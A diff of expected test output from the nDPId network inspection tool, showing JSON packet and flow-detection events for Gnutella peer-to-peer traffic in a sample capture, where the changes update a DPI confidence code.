00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":111377,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111377,"pkt":"UlQAEjUCCAAn5uVZCABFAABtaUIAAIARBHoKAAIPSIx4KXAJunsAWR8sGNIxAigwQqvDAye6DaSDvEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":111378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111378,"pkt":"UlQAEjUCCAAn5uVZCABFAABt\/AEAAIARkCAKAAIPWHhJ13AJX\/IAWXHaSscxAtAehZxkzy2fwIIymUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1945,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":111410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":111410,"pkt":"UlQAEjUCCAAn5uVZCABFAABtEcUAAIARHzgKAAIPYPacfnAJxHkAWT0ZQMwxAkCcLpcbJhOCUhZqY0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} @@ -1161,16 +1161,16 @@ 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":114930,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":114930,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0z\/pAAIAGGNQKAAIPvZNIU8SYZfyEcE5AAAAAAIAC+vBk5AAAAgQFtAEDAwgBAQQC"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1970,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":2,"flow_last_seen":115039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":115039,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBeIAAEAGgIBFdqLlCgACD7c6xJcA8yoBKsf7BWAS\/\/\/XGAAAAgQFtA=="} 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1971,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":3,"flow_last_seen":115039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":115039,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobAxAAIAGmlkKAAIPRXai5cSXtzoqx\/sFAPMqAlAQ+vDz5AAA"} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1972,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":115040,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1972,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":115040,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1974,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":2,"flow_last_seen":115124,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":115124,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBeQAAEAGYvO9k0hTCgACD2X8xJgA9CQBhHBOQWAS\/\/9j5QAAAgQFtA=="} 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1975,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":3,"flow_last_seen":115126,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":115126,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoz\/tAAIAGGN8KAAIPvZNIU8SYZfyEcE5BAPQkAlAQ+vCAsQAA"} -00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1976,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":115127,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1976,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":115127,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1980,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":115369,"flow_last_seen":115369,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":115369,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1980,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":115369,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":115369,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4ticAAIARadEKAAIPDsj\/5XAJkMIAJDeaLGAxAs8iaaH\/Df9W3JltAwABAAUAAADDglFLQA=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1982,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":2,"flow_last_seen":115702,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":115702,"pkt":"CAAn5uVZUlQAEjUCCABFAABKBegAAEARWf8OyP\/lCgACD5DCcAkANl\/hLGAxAs8iaaH\/Df9W3JltAwEBABcAAADCkA7I\/+WyNgAAAAAgAMOCUUtEGERIlw=="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":116628,"flow_last_seen":116628,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":116628,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":116628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":116628,"pkt":"UlQAEjUCCAAn5uVZCABFAABtIxgAAIARvpEKAAIPUAf8wHAJGugAWSw6p+kxAjYZLonacBdkV9ywAUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":116628,"flow_last_seen":116628,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":116628,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":116628,"flow_last_seen":116628,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":116628,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":28681,"dst_port":6888,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":2,"flow_last_seen":116679,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":116679,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBfMAAEARGTFQB\/zACgACDxrocAkC3\/Iip+kxAjYZLonacBdkV9ywAUQAAMACAAAGR1RLRwAAZxkkdSip9v6JKj37UBrDicBfjMAEUAf8wBroAQAAAASysOQuFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtUw=="} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":3,"flow_last_seen":116776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":116776,"pkt":"UlQAEjUCCAAn5uVZCABFAABte4sAAIAR7VYKAAIPLR+YcHAJaOMAWSdx+0cxAtvllYjgRR1H\/sPbPUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2005,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":3,"flow_last_seen":116859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":116859,"pkt":"UlQAEjUCCAAn5uVZCABFAABt9MUAAIARu2AKAAIPUkAsC3AJBUgAWR\/CHmUxAhaifRIPh7YCtQDKL0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} @@ -1182,58 +1182,58 @@ 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2111,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":3,"flow_last_seen":123877,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":123877,"pkt":"UlQAEjUCCAAn5uVZCABFAABtptcAAIAR2PwKAAIPpIQKGXAJ2AYAWdpE9ZMxAnuYArMNMRKsJogRPUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2113,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.116.64.132","src_port":28681,"dst_port":51227,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2113,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":123912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":123912,"pkt":"UlQAEjUCCAAn5uVZCABFAABtUhMAAIARg2YKAAIPGHRAhHAJyBsAWUp2fKAxAtxaLOqCcitFlOv4V0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2113,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.116.64.132","src_port":28681,"dst_port":51227,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2113,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.116.64.132","src_port":28681,"dst_port":51227,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2114,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.198.205.196","src_port":28681,"dst_port":20778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2114,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":123912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":123912,"pkt":"UlQAEjUCCAAn5uVZCABFAABt60MAAIARl6IKAAIP3cbNxHAJUSoAWRoYg28xAvjrsUFUSfHbBKidMkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2114,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.198.205.196","src_port":28681,"dst_port":20778,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2114,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"221.198.205.196","src_port":28681,"dst_port":20778,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2115,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2115,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":123912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":123912,"pkt":"UlQAEjUCCAAn5uVZCABFAABtoEYAAIAR\/8UKAAIPV3s26nAJ03IAWfTcKgkxAlGmPJUzLkH07Ma7h0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2115,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2115,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":123912,"flow_last_seen":123912,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":123912,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":28681,"dst_port":54130,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2118,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":2,"flow_last_seen":124065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":124065,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBkcAAEARuhndxs3ECgACD1EqcAkC3zKOg28xAvjrsUFUSfHbBKidMkQAAMACAAAGR1RLRwAAhAWx\/4G\/aeOxkw5wrlcHOTlCresE3cbNxFEqAQAAAAT9knizFEdUS0cAAIPPdMtTw3ywAQrcKHskULaFt8T9BFd7NurTckdUS0cAAIBDDfCNVDqFgBWTNBe\/R1a2V7AXBLm7Sq3Q8UdUS0cAAI1c\/QX9I39S2eczHf8bGxQqBh3SBCaOd+rCRFdTSFIAAIsML3baZ9qjEzov01XuwUWPp8CvBBiB6TxOFldTSFIAAIgInuBYn2DWNYTpgSOhE3nGOSSqBGLQGpoTgldTSFIAAJMpLUy99S6l5+o3G\/7HZbY0zUPGBFnUW5sUS1NOT1cAAJJLJdecP9uDvZhuUeP7MwcedtuWBM8mo+QaekdUS0cAAJ6Xxzbx1oA8a67zMFTEYzHds+ukBEziVWkYyldTSFIAAJ7Bez1ZQQgPxovuLAykgS8CMrDdBLAKqQox\/0dUS0cAAJp\/6ofTpH0Z7c9sfONgy\/6jjg5ZBFTFYV4FUFdTSFIAAJgFqYyWS9v2Yq4KyYrmzTVJWc5SBGP6\/WMuK0dUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAALd6AZ7svQKtiRxAHRTzpxSemu\/LBNXlb+ATDEdUS0cAALSr6ArQaneMzMJ81PWuqjO12gqLBLV2NdR1LkdUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo40dUS0cAAL1cZVAaZZhJTOPlkpw6jfT8aYRtBD\/kr6kHkA=="} 